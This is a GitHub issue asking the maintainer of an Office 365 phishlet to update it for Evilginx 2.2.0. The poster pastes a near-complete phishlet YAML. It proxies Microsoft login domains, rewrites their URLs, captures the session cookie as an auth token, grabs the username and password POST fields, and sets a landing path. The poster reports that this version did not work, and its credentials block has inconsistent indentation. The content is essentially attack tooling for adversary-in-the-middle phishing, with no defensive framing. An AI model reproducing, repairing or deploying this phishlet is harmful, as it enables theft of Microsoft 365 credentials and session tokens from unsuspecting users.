### ISSUE TITLE
Not compatible with Evilginx 2.2.0

### ISSUE THREAD

**Issue by wikijm** [JRodriguez556/evilginx-0365-beta#1]
Hi @JRodriguez556

Is it possible to provide a newer version in order to be compatible with Evilginx on 2.2.0 version?
There is more information here: https://github.com/kgretzky/evilginx2/wiki/Phishlet-File-Format-(2.2.0)

I tried to apply the update, with no success:
```yaml
name: 'o365'
author: '@Jrodriguez556'
min_ver: '2.2.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'account', orig_sub: 'account', domain: 'microsoftonline.com', session: false, is_landing: false}
sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/ppsecure/', replace: 'https://{triggers_on}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/GetCredentialType.srf', replace: 'https://{triggers_on}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/GetSessionState.srf', replace: 'https://{triggers_on}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/common/', replace: 'https://{triggers_on}/common/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/common/oauth2/', replace: 'https://{triggers_on}/common/oauth2/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{triggers_on}/common/oauth2/authorize', replace: 'href="https://{triggers_on}/common/oauth2/authorize', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'account', domain: 'microsoftonline.com', search: '{triggers_on}', replace: '{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.microsoftonline.com', orig_sub: 'account', domain: 'microsoftonline.com', search: 'href="https://{triggers_on}', replace: 'href="https://{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.microsoftonline.com', orig_sub: 'live', domain: 'microsoftonline.com', search: '{triggers_on}', replace: '{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.microsoftonline.com', orig_sub: 'account', domain: 'microsoftonline.com', search: '{triggers_on}', replace: '{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'www.office.com', orig_sub: 'www', domain: 'office.com', search: '{triggers_on}', replace: '{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}', replace: 'https://{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'www.office.com', orig_sub: 'www', domain: 'office.com', search: '{triggers_on}/prefetch/prefetch', replace: '{triggers_on}/prefetch/prefetch', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/common/instrumentation/reportpageload?mkt=en-US', replace: 'https://{triggers_on}/common/instrumentation/reportpageload?mkt=en-US', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'outlook.office365.com', orig_sub: 'outlook', domain: 'office365.com', search: 'https://{triggers_on}/owa/prefetch.aspx', replace: 'https://{triggers_on}/owa/prefetch.aspx', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'admin.onedrive.com', orig_sub: 'admin', domain: 'onedrive.com', search: 'https://{triggers_on}', replace: 'https://{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'browser.pipe.aria.microsoft.com', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', search: 'https://{triggers_on}', replace: 'https://{triggers_on}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'browser.pipe.aria.microsoft.com', orig_sub: 'browser.pipe.aria', domain: 'microsoft.com', search: 'https://{triggers_on}/Collector/3.0/', replace: 'https://{triggers_on}/Collector/3.0/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/common/GetCredentialType?mkt=en-US', replace: 'https://{triggers_on}/common/GetCredentialType?mkt=en-US', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/common/oauth2/authorize', replace: 'https://{triggers_on}/common/oauth2/authorize', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{triggers_on}/common/SAS/ProcessAuth', replace: 'https://{triggers_on}/common/SAS/ProcessAuth', mimes: ['text/html', 'application/json', 'application/javascript']}

auth_tokens:
  - domain: 'microsoftonline.com'
    keys: ['WLSSC']
credentials:
  username:
    key: 'login'
	search: '(.*)'
	type: 'post'
  password:
    key: 'passwd'
	  search: '(.*)'
	  type: 'post'
landing_path:
  - '/common/oauth2/authorize?client_id=00000006-0000-0ff1-ce00-000000000000&response_mode=form_post&response_type=code+id_token&scope=openid+profile&state=OpenIdConnect.AuthenticationProperties%3dRMwoo4EFah-1dcMWNFUjhypbsOPo_OXi9YewhLcr8VRjwRXf5kW_wglRTTBGB60hfZyK5CjecVsEBSvfFuEzi0uNjjU-KEz_PoMp5OqDwEdU3m_HnlI9jtAGLbvs5dNtXkhV7bk0aLD7CmVZr0S-9NXyhq7NGeecCQ0gZ0ruLZ8&nonce=636716831389849970.OGFkNjRkYWYtYTFmMi00Mjg0LTg5MjUtZTU0MGY4YjA2YmY5ZWVkNDAzNDMtYjgzZC00OWE4LThjZGEtMWY4NzIxNmQ3OTNi&redirect_uri=https%3a%2f%2fportal.office.com%2flanding&ui_locales=en-US&mkt=en-US&client-request-id=0bf67fb5-3fdb-483a-ab6d-7c2ad03dd4df'
```

Sincerely,
WikiJM
